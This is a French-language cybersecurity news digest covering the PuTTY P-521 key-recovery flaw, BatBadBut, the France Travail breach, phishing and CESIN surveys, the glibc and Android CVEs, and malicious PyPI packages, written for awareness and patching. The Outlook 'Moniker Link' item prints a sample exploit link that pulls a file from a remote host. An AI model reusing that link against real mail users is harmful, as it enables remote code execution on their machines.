Cette technique est désormais courante et la RFC 6979 documente une manière spécifique et bien connue de la mettre en œuvre. Mais PuTTY n'a pas suivi cette spécification, car nous avons commencé à faire la même chose en 2001 et la RFC n'a été publiée qu'en 2013.

La technique de PuTTY fonctionnait en créant un hachage SHA-512, puis en le réduisant mod q , où q est l'ordre du groupe utilisé dans le système DSA. Pour un DSA entier (pour lequel la technique de PuTTY a été initialement développée), q est d'environ 160 bits ; pour le DSA à courbe elliptique (qui est venu plus tard), il a à peu près le même nombre de bits que le module de courbe, donc 256 ou 384 ou 521 bits pour les courbes NIST.

Dans tous ces cas, à l'exception de P521, le biais introduit par la réduction d'un nombre mod q de 512 bits est négligeable. Mais dans le cas de P521, où q a 521 bits (soit plus de 512), réduire un nombre de 512 bits mod q n'a aucun effet – vous obtenez une valeur de k dont les 9 premiers bits sont toujours nuls.

Ce biais est suffisant pour permettre une attaque de récupération de clé. C'est moins immédiat que si un attaquant connaît tout k, mais il s'avère que si k a une distribution biaisée de cette manière, il est possible d'agréger les informations de plusieurs signatures et éventuellement de récupérer la clé privée. Apparemment, le nombre de signatures requises est d'environ 60."

La vulnérabilité a été corrigée dans PUTTY 0.81 qu'il convient d'utiliser exclusivement désormais. Mais pour être en toute sécurité cela n'est pas suffisant. Vous devez également générer et utiliser de nouvelle spaires de clés, sans oublier de supprimer les ancviennes clés publiques des fichiers ~/.ssh/authorized_keys  sur les servuers que vous administrez.

La vulnérabilité est présente aussi dans FileZilla, WinSCP et TortoiseGit. Vous devez passer aux versions PuTTY 0.81, FileZilla 3.67.0, WinSCP 6.3.3 et TortoiseGit 2.15.0.1

BatBadBut est une vulnérabilité qui permet à un attaquant d'effectuer, sous certaines conditions spécifiques, une injection de commandes sur des applications Windows qui dépendent indirectement de la fonction CreateProcess. Un exploit de cette faille permet donc de lancer des commandes arbitraires.

Un billet de RyotaK, l'ingénieur en sécurité chez Flatt Security qui a découvert cette vulnérabilité, en donne en détails les tenants et les aboutissants techniques. L'auteur a baptisée cette vulnérabilité BatBadBut pour 'les mauvais fichiers batch, mais pas les pires'.

Pour RyotaK, la cause première de l'existence de la vulnérabilité BatBadBut est le 'comportement négligé de la fonction CreateProcess sous Windows'. Cette faille intéresse potentiellement tous les développeurs. En effet plupart des langages de programmation fournissent dans leur bibliothèque standard une fonction permettant d'exécuter une commande et pour cela, ils enveloppent la fonction CreateProcess pour fournir une interface de programmation plus conviviale.

Selon RyotaK, les langages et frameworks concernés sont au moins Erlang, Go, Haskell, Java, Node.js, PHP, Python, Ruby, Rust

Il existe déjà un correctif pour Haskell, Node.js, PHP et Rust. Erlang, Go, Python et Ruby ont mis à jour leur documentation à ce sujet. Selon RyotaK, Java ne corrigera pas la vulnérabilité.

Tous les développeurs, quels que soient les langages et frameworks qu'ils utilisent, ont intérêt à se documenter sur BatBadBut et à appliquer sans tarder un correctif à leur bibliothèque standard s'ils en disposent, ou à vérifier leur code afin que les arguments transmis à la fonction CreateProcess soient correctement sécurisés en amont.

France Travail, anciennement Pôle Emploi, a annoncé avoir été piraté dans un communiqué. On peut y lire : La base de données qui aurait été extraite de façon illicite contient les données personnelles d’identification des personnes actuellement inscrites, des personnes précédemment inscrites au cours des 20 dernières années ainsi que des personnes non inscrites sur la liste des demandeurs d'emploi mais ayant un espace candidat sur francetravail.fr. C’est donc potentiellement les données personnelles de 43 millions de personnes qui ont été exfiltrées.

Le communiqué précise : Compte tenu des investigations techniques menées, les données personnelles d’identification exposées sont les suivantes : nom et prénom, date de naissance, numéro de sécurité sociale, identifiant France Travail, adresses mail et postale et numéros de téléphone. Les mots de passe et les coordonnées bancaires ne sont pas concernés par cet acte de cybermalveillance. Il n’existe donc aucun risque sur l’indemnisation.

Le site cybermalveillance.gouv.fr a mis en ligne un formulaire afin que les personnes concernées par cette violation de leurs données personnelles ont la possibilité de déposer plainte si elles le souhaitent, sans avoir à se rendre dans un commissariat ou une gendarmerie. La page de cybermalveillance.gouv.fr indique que l'attaque informatique a eu lieu entre le 6 février et le 5 mars 2024. Soit une plage d'un mois, ce qui semble être un temps fort long.

Vue la situation, la CNIL a publié une page donnant des conseils aux personnes concernées par ce piratage de données, et ajoute : Devant l’ampleur de la violation, la présidente de la CNIL a décidé de mener très rapidement des investigations afin de déterminer notamment si les mesures de sécurité mises en œuvre préalablement à l’incident et en réaction à celui-ci étaient appropriées au regard des obligations du Règlement général sur la protection des données (RGPD).

Alors que l’Anssi publie aujourd’hui son Panorama de la menace, notant une augmentation de 30% des cyberattaques visant à dérober les données des Français, l’enquête annuelle de Proofpoint, State of the Phish 2024 présente des conclusions édifiantes quant aux risques pris par les Français eux-mêmes.

Cette dixième édition du rapport annuel State of the Phish de Proofpoint révèle que plus des trois quarts (75 %) des salariés français mettent sciemment leur organisation en danger, entraînant une multiplication des risques d’infections par rançongiciel ou logiciels malveillants, un accroissement des cas de violation de données, et des pertes financières plus grandes.

Et si en France les cas de campagnes d’hameçonnage réussies ont légèrement diminué (66 % des organisations interrogées ont subi au moins une attaque réussie en 2023 contre 86 % l’année précédente), la France se démarque par l’augmentation substantielle des sanctions financières notamment imposées par les législateurs (+320 % contre 144 % en moyenne dans le monde) et par les atteintes à la réputation de l’entreprise (+166 % en France contre une augmentation moyenne de 50 % dans le reste du monde).

Le rapport 2024 souligne aussi que les comportements à risque ne sont pas nécessairement dus à un manque de connaissances en matière de cybersécurité, mais à l’écart qui existe entre les limites des technologies de sécurité individuelle et la formation des utilisateurs. Si les professionnels de la sécurité estiment que la plupart de leurs collaborateurs comprennent la responsabilité qu’ils ont dans la protection de leur organisation, il semble que la sensibilisation à la sécurité ne soit pas suffisante pour prévenir complètement ces comportements dangereux.

« Les cybercriminels savent qu’un individu peut être facilement trompé, que ce soit par négligence, à travers la compromission d’identité ou, dans certains cas, par appât du gain », a déclaré Ryan Kalember, directeur de la stratégie chez Proofpoint. « Les utilisateurs jouent un rôle central dans la posture de sécurité de l’organisation, 74 % des violations étant encore centrées sur l’humain. Bien qu’il soit important de renforcer la culture de sécurité de l’entreprise, la formation à elle seule n’est pas une solution miracle. Il y a une différence notoire entre la parole et l’action : le défi n’est plus seulement la sensibilisation, mais aussi le changement de comportement. »

Le rapport State of the Phish de cette année apporte un aperçu détaillé du paysage actuel de la menace cyber, dans lesquelles l’IA générative, les QR codes et l’authentification multifactorielle (MFA) sont utilisés de manière abusive par des acteurs malveillants, comme en témoignent les données de télémétrie internes. En effet, Proofpoint a analysé plus de 2,8 milliards de courriers électroniques dans 230 000 organisations à travers le monde, ainsi que les résultats de 183 millions de simulations d’attaques par hameçonnage au cours des douze derniers mois.

Les principales conclusions du rapport State of the Phish 2024 pour la France sont les suivantes :

Les collaborateurs n’exposent pas leur entreprise aux cyberattaques par manque de sensibilisation : 79 % des sondés français ont admis avoir pris des mesures risquées, telles que la réutilisation ou le partage d’un mot de passe, le fait de cliquer sur des liens provenant d’expéditeurs inconnus, ou en communiquant leurs informations d’identification à une source non fiable. Parmi eux, 95 % l’ont fait en connaissance des risques inhérents à la sécurité, ce qui signifie que 75 % des salariés français interrogés ont volontairement porté atteinte à la sécurité de leur entreprise. Les objectifs derrière les actions risquées sont variés, la plupart des sondés citant la commodité (43 %), le désir de gagner du temps (36 %) et le sentiment d’urgence (29 %) comme principales motivations.

Un écart entre les équipes informatiques et le reste de l’organisation empêche un réel changement de comportement : alors que 79 % des professionnels français de la sécurité interrogés déclarent que la plupart de leurs collaborateurs comprennent la responsabilité qu’ils portent quant à la sécurité de l’entreprise, 64 % des employés interrogés n’en sont pas sûrs ou affirment qu’ils ne sont pas du tout responsables. Et même si la quasi-totalité des employés qui ont pris des mesures risquées connaissait les risques (95 %) — ce qui indique clairement que la formation en matière de sécurité contribue à sensibiliser les employés — il existe de nettes disparités entre la vision des professionnels de la sécurité et celle des autres collaborateurs, pour créer un véritable changement de comportement à l’échelle de l’entreprise. En France, les professionnels de la sécurité estiment que plus de formation (76 %) et des contrôles plus stricts (80 %) sont la solution, mais presque tous les employés interrogés (94 %) ont déclaré qu’ils donneraient la priorité à la sécurité si les contrôles étaient simplifiés et plus conviviaux. 

La MFA continue de donner un faux sentiment de sécurité : plus d’un million d’attaques sont lancées chaque mois à l’aide d’EvilProxy, un système de contournement de la MFA. Pourtant, il est inquiétant de constater que 91 % des professionnels français de la sécurité pensent encore que la MFA offre une protection complète contre la prise de contrôle d’un compte.

L’IA booste les attaques par compromission d’identité (BEC) : en France, 62 % des organisations interrogées ont été la cible d’attaques BEC (Business Email Compromise) en 2023, un chiffre en baisse par rapport à l’année précédente où le pourcentage était de 80 %. Dans l’ensemble, il y a eu moins de signalements de tentatives de fraude par courriel au niveau mondial, mais certains pays ont connu une augmentation du volume d’attaques, comme le Japon (+35 %), la Corée du Sud (+31 %) et les Émirats Arabes Unis (+29 %). Ces pays ont peut-être été moins touchés par les attaques BEC dans le passé en raison de barrières culturelles ou linguistiques, mais l’utilisation de l’IA générative permet aux attaquants de créer des courriels plus convaincants et personnalisés dans plusieurs langues. En moyenne, Proofpoint détecte 66 millions d’attaques BEC ciblées chaque mois.

La cyber extorsion reste une forme d’attaque lucrative et le paiement de rançon ne garantit pas la récupération complète des données : 70 % des organisations françaises interrogées ont été infectées par un rançongiciel au cours de l’année écoulée (soit une augmentation de 6 points de pourcentage d’une année sur l’autre) ; de manière alarmante, 63 % des professionnels français de l’informatique ont déclaré que leur organisation avait été infectée par plusieurs rançongiciels distincts. Parmi les organisations touchées en France, 30 % ont accepté de payer les attaquants (contre 54 % en moyenne dans le monde), et seuls 47 % ont retrouvé l’accès complet à leurs données après un seul paiement (contre 63 % il y a un an).

Les attaques par téléphone (TOAD) continuent de proliférer : bien qu’apparaissant initialement comme un message innocent, ne contenant rien de plus qu’un numéro de téléphone et quelques informations erronées, la chaîne d’attaque est activée lorsqu’un collaborateur peu méfiant appelle un centre d’appel frauduleux, fournissant ses informations d’identification ou accordant un accès à distance à des acteurs malveillants. Proofpoint détecte en moyenne 10 millions d’attaques TOAD par mois, avec un pic récent en août 2023, avec 13 millions d’incidents.

Malgré l’importance et la sophistication croissante des menaces telles que les rançongiciels, les TOAD et les contournements de MFA, de nombreuses organisations ne sont pas suffisamment préparées ou formées pour y faire face. Seuls 16 % des organisations françaises interrogées forment leurs utilisateurs à la reconnaissance et à la prévention des attaques TOAD, et seulement 25 % à la sécurité de l’IA générative.

Pour télécharger le rapport State of the Phish 2024 : proofpoint.com/us/resources/threat-reports/state-of-phish.

Une faille critique a été découverte dans le logiciel de mesagerie Microsoft Outlook par Haifei Li, chercheur en sécutité de la société Check Point. Cette vulnérabilité est estampillée CVE-2024-21413. Cette vulnérabilité est critique car son exploit permet l'exécution de code arbitaire à distance sans d'autre action de l'utilisateur que cliquer sur un lien malicieux présent dans un mail contenant l'attaque.

Microsoft a publié un correctif qui fait partie du Tuesday Patch de février. Celui-ci doit être appliqué d'urgence sur les machines qui sont configurées pour ne pas appliquer les mises à jour automatiquement. Les systèmes affectés sont :

• Microsoft Office 2016
• Microsoft Office 2019
• Microsoft Office LTSC 2021
• Microsoft 365 Apps

Cette faille est baptisée Moniker Link. Pour l'exploiter il suffit d'incorporer un simple lien malicieux dans un mail. Le lien peut ressembler à ça :

<a href="file:///\\10.10.111.111\test\test.rtf!something">CLICK ME</a>

C'est la presence du point d'exclamation (!) devant la chaîne aléatoire 'something' qui déclenche l'exploit de la vulnérabilité. Un tel lien contourne la protection interne d'Outlook contre le téléchargement de ressources distantes. Un clic sur un tel lien va télécharger et ouvrir le fichier sans qu'Outlook émette le moindre avertissement. Si le fichier téléchargé est par exemple un fichier Office qui contient du code malicieux, celui-ci sera exécuté.

Cette faille est entièrement expliquée techniquement dans un très intéressant billet de Haifei Li sur le blog de Check Point.

La bibliothèque glibc est au cœur de tous les systèmes Linux. Une grave faille vient d'y être découverte qui, exploitée, permet une élévation de privlège. Cette faille a été introduite dans la version 2.36 de glibc. Cette vulnérabilité est assez similaire à une autre, découverte en 1993, dans la fonction vsyslog des anciens systèmes Linux.

La faille qui nous intéresse aujourd'hui est estampillée CVE-2023-6246 Le bulletin de sécurité nous apprend qu'un dépassement de tampon basé sur le tas a été trouvé dans la fonction __vsyslog_internal de la bibliothèque glibc. Cette fonction est appelée par les fonctions syslog et vsyslog. Ce problème se produit lorsque la fonction openlog n'a pas été appelée ou appelée avec l'argument ident défini sur NULL et que le nom du programme (le nom de base de argv[0]) est supérieur à 1 024 octets, ce qui entraîne un crash de l'application ou une élévation des privilèges locaux. Ce problème affecte la glibc 2.36 et versions ultérieures.

Il a été vérifié que Debian 12 et 13, Ubuntu 23.04 et 23.10, et Fedora 37 à 39, entre autres, sont vulnérables à ce débordement de tampon.

De l'avis d'experts en la matière cette vulnérabilité ne peut pas être exploitée à distance dans n'importe quel scénario probable, car un exploit nécessite un argv[0], ou un argument d'identification openlog(), de plus de 1024 octets.

Cependant il est très vivement recommandé aux administrateurs systèmes de faire leur mise à jour dès qu'un correction sera disponible.

Un très intéressant billet sur la liste de diffusion d'OpenWall explique les détails techniques relatifs à cette faille et donne une preuve de concept.

Afin de mieux cerner l’état de l’art et la perception de la cybersécurité et de ses enjeux au sein des organisations, le CESIN publie depuis 2015 son baromètre annuel avec OpinionWay. L’association dévoile aujourd’hui les résultats de cette nouvelle enquête indépendante et exclusive menée auprès de ses membres, Directeurs Cybersécurité et Responsables Sécurité des Systèmes d'Information (RSSI). Ce sondage OpinionWay pour le CESIN porte sur un échantillon de 456 répondants, membres du CESIN, dont 40% provenant d'Entreprises de Taille Intermédiaire (ETI) et 48% de grandes entreprises.

L’étude révèle que le nombre des cyberattaques réussies reste stable (49%), moins d’une entreprise sur deux déclare avoir subi au moins une cyberattaque avec un impact significatif.
(le baromètre tient compte uniquement des attaques réussies, ayant eu des répercussions significatives pour les victimes - cf : définition de Cyberattaque pour l’enquête CESIN-OpinionWay ).

La menace est omniprésente et en constante évolution, cependant les efforts déployés sont probants dans l'anticipation des crises, avec notamment les investissements dans les outils de protection, l'amélioration de la capacité de détection et de gestion des incidents, les campagnes de sensibilisation ou encore les exercices d'entraînement aux situations de crises.

Bien que le Phishing demeure le principal mode d'attaque, signalé par 60% des entreprises comme vecteur d'entrée principal pour les attaques subies, il semble que cette méthode devienne plus sophistiquée et plus ciblée, elle engendre une baisse de 14 points. L’arnaque au Président diminue fortement (28%) avec un recul de 13 points.

Parallèlement, on note une augmentation des attaques en déni de service, un impact croissant corroboré par plusieurs études alertant notamment sur des attaques DDoS hyper-volumétriques. Cette augmentation peut-être attribuée à divers facteurs. Techniques par exemple, avec l’essor des botnets massifs, ou encore liés aux tensions géopolitiques et pouvant s’intensifier lors de périodes critiques, comme lors d’élections, de manifestations ou d’événements politiques majeurs.

Les cyberattaques opportunistes perdurent et sont fréquentes (39%), toutefois, l’édition 2024 du baromètre confirme à nouveau la complexité croissante du paysage de la cybersécurité, avec des attaquants qui ajustent leurs tactiques. Les demandes de rançons se stabilisent autour de 10% d’entreprises victimes de cyberattaques. Le cyberespionnage représente quant à lui un risque élevé pour 2 entreprises sur 5, toutes industries confondues, un résultat qui revêt une importance particulière étant donné que certaines organisations, en raison de leur domaine d'activité, ne sont pas très exposées à ce type de menace. Enfin, l'enquête met en lumière la persistance de mauvaises pratiques comme sources d'incidents. A l’exception des risques induits par le télétravail, les responsables cyber voient une hausse des usages numériques à risque qui échappent au contrôle de l’entreprise (shadow IT), on note aussi les vulnérabilités résiduelles permanentes, la négligence ou encore les erreurs de configuration.

65% déclarent que les attaques ont eu des impacts sur le business, avec perturbation de la production pour 24% d’entre eux. 22% indiquent une indisponibilité du site web pendant une période significative, un impact en hausse dû à l’augmentation des attaques en déni de service.

La confiance envers les solutions et services de sécurité du marché reste élevée, avec 87% des répondants qui jugent ces offres adaptées. Au global, on compte une moyenne de plus de 15 solutions ou services par entreprise. Le couple MFA (Authentification multi-facteurs) et EDR (Système de détection et réponse pour endpoints) est vu comme très efficace. Cependant, l'analyse souligne aussi une sous-utilisation de solutions éprouvées, malgré leur efficacité avérée. L’EDR progresse de 9 points, en tête des solutions déployées (90%), le concept Zero Trust gagne en maturité, déployé par 76% des entreprises. Le VOC (Vulnerability Operation Center) est désormais utilisé par 50% d’entres elles, tandis que le CAASM (Cyber Asset Attack Surface Management) émerge (34%).

Les entreprises privilégient généralement le traitement interne de la gestion des vulnérabilités, du VOC et de la gestion de la surface d’attaque. Les audits, Pentests, la Threat Intelligence et les CERT-CSIRT sont bien sûr davantage externalisés. À noter qu'une part significative des EDR et des SOC est gérée de manière hybride.

L’écosystème de la cybersécurité est réceptif aux innovations, la moitié des entreprises adopte des offres émanant de startups, témoignant ainsi d'une disposition à prendre des risques mesurés.

Le Cloud occupe une place significative dans les systèmes d'information, avec un tiers à un quart des entreprises ayant plus de 50% de leur SI en IaaS/PaaS et SaaS. Les responsables cyber notent des risques persistants liés au contrôle des sous-traitants et aux accès administrateurs, bien que le niveau d'expertise global s'améliore dans ce domaine.
La souveraineté et le Cloud de Confiance présentent intérêt significatif puisqu’une entreprise sur deux (55%) montre un attrait marqué pour ces initiatives.

Concernant les normes, une majorité écrasante d’entreprises les intègre régulièrement dans leurs pratiques quotidiennes. 88% estiment que les normes sont une composante essentielle du paysage cyber, et recherchent activement des certifications pour l’interne, comme pour leurs partenaires.

La Cyberassurance a séduit 7 entreprises sur 10 et la plupart envisage de renouveler ses contrats, signalant une stabilisation dans le champ des entreprises assurées. Le recours à l'assurance n’est pas systématique, malgré une moyenne de trois incidents par an et par entreprise, trois quarts d'entre elles n'ont pas recours à la cyberassurance. Cette observation suggère que deux incidents sur trois en moyenne ne font pas l'objet de déclarations d'assurance, laissant supposer que l'impact de ces incidents est inférieur aux montants des franchises. Cette situation pourrait être expliquée par la capacité des entreprises à gérer ces incidents sans supporter des coûts significatifs. En outre, la confiance a baissé envers les agences de notation dont il est estimé que les résultats sont très partiels.

La réglementation et l'impact de l'IA incitent les entreprises à prendre des mesures. Actuellement, 7 entreprises sur 10 déclarent être impactées par au moins une réglementation, telle que NIS2, DORA, ou Cyberscore.

En ce qui concerne l’Intelligence Artificielle (IA), près de la moitié des RSSI, soit 46%, observent son utilisation en interne. Cependant, seuls 16% l'ont intégré dans leur stratégie de cybersécurité. Cette adoption modérée incite les RSSI à considérer l'adaptation des solutions à la transformation numérique de l'entreprise comme leur principal défi à venir, avec un taux de 52%.

Bien que les inquiétudes quant à la capacité à faire face aux cyberattaques diminuent légèrement, passant de 43% à 38%, la proportion de ceux qui se disent « très inquiets » chute de 9% à 5%.

Enfin, plus de la moitié des entreprises a l'intention d'accroître ses effectifs dédiés, et la grande majorité (78%) envisage d'acquérir de nouvelles solutions techniques. Les budgets pour faire face aux risques cyber restent stables.

ESET Research a découvert un groupe de projets malveillants distribués via PyPI, le dépôt officiel de Python (langage de programmation). La menace cible à la fois les systèmes Windows et Linux et fournit une porte dérobée personnalisée avec des capacités de cyberespionnage. Elle permet l'exécution de commandes à distance et l'exfiltration de fichiers, et inclut parfois la possibilité de prendre des captures d'écran. Dans certains cas, la charge utile finale est une variante du célèbre W4SP Stealer. Celui-ci permet le vol des données personnelles et des informations d'identification, ou de surveiller le presse-papiers pour voler des crypto-monnaies, voir les deux.

ESET a découvert 116 fichiers dans 53 projets contenant des logiciels malveillants. Au cours de l'année écoulée, les victimes ont téléchargé ces fichiers plus de 10 000 fois. À partir de mai 2023, le taux de téléchargement était d'environ 80 par jour.

PyPI est populaire parmi les programmeurs Python car il permet le téléchargement de code tout prêt. Tout un chacun pouvantt contribuer au dépôt, des logiciels malveillants se faisant passer pour des bibliothèques de code légitimes et populaires peuvent apparaître. « Certains noms de paquets malveillants ressemblent à d'autres paquets légitimes, mais nous pensons que la principale façon dont ils sont installés par les victimes potentielles n'est pas le typosquatting, mais l'ingénierie sociale. Les victimes sont amenées à installer un paquet « intéressant » à travers l’outil PIP. », explique Marc-Étienne Léveillé, chercheur chez ESET, qui a découvert et analysé les paquets malveillants.

La plupart des paquets avaient déjà été retirés par PyPI au moment de la publication de cette recherche. ESET a communiqué avec PyPI pour prendre des mesures concernant ceux qui restent. À l'heure actuelle, tous les paquets malveillants connus sont hors ligne.

« Les développeurs Python doivent vérifier le code qu'ils téléchargent avant de l'installer sur leurs systèmes. Nous nous attendons à ce que de tels abus de PyPI se poursuivent et nous recommandons la prudence dans l'installation de code à partir d'un dépôt de logiciels public », conclut M. Léveillé. 

Google a publié son bulletin de sécurité Android de décembre 2023. Dans ce bulletin, nous apprenons l'existence d'une vulnérabilié critique de type 'zero-click', ce qui signifie que la vulnérabilité peut être exploitée par un attaquant sans que le propriétaire  de l'appareil attaqué fasse quoi que ce soit.

Le plus grave de ces problèmes est une vulnérabilité de sécurité critique dans le composant Système qui pourrait conduire à l'exécution de code à distance (proximal/adjacent) sans privilèges d'exécution supplémentaires nécessaires. L’interaction de l’utilisateur n’est pas nécessaire pour l’exploitation. L'évaluation de la gravité est basée sur l'effet que l'exploitation de la vulnérabilité pourrait avoir sur un appareil affecté, en supposant que les atténuations de la plate-forme et du service soient désactivées à des fins de développement ou si elles sont contournées avec succès, écrit Google.

Cette vulnérabiltié est estampillée CVE-2023-40088. Le bulletin de sécurité correspondant nous apprend que les systèmes Android 11 à 14 sont concernés. Une attaque réussie peut aboutir à une exécution de code arbitraire à distance (autrement dit l'attaquant peut potentiellement prendre le contrôle de l'appareil,) ou à un déni de service à distance.

Dans son bulletin de sécurité, Google indique fièrement que la faille a été colmatée. Fort bien. La question est maintenant de savoir, en raison de la fragmentation de l'écosystème Android, quand le correctif arrivera sur les appareils des utilisateurs. S'il arrive un jour…